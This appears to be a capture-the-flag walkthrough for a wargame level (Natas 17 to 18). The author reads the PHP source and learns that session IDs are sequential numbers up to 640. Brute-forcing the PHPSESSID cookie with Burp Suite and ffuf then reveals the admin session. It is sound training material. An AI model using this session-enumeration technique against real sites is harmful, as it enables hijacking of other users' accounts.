Level 17 - Level 18
Last updated
Last updated
This time we got a login page and also a link to the source code. And its mentioned that, we have to login as the admin to get the password for next level.
On checking the source code. we can see the maxid
variable, which defines the maximum number of users, in this case 640
users, and also you can see that the function my_session_start looks out for a session cookie named PHPSESSID
.
Let's try to login with some random credentials. The application responded that "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19
".
I captured the request of the above login attempt with burpsuite. On checking it, the response to the logic request responded back with a cookie PHPSESSID=184
.
So I decided to brute force this cookie value to find the id of the admin. For that, first I created a word list that contains all the possible user id's ( since we know the maximum number of users is 640
).
Next, I used ffuf
to brute force the cookie value using the word list that we generated above using the following command.
From the result of above ffuf
command, we can see that 119
was the only id that didn't had the line "You are logged in as a regular user." in its response.
So I tried to login with a session id of 119
, it worked and got the password for the next level.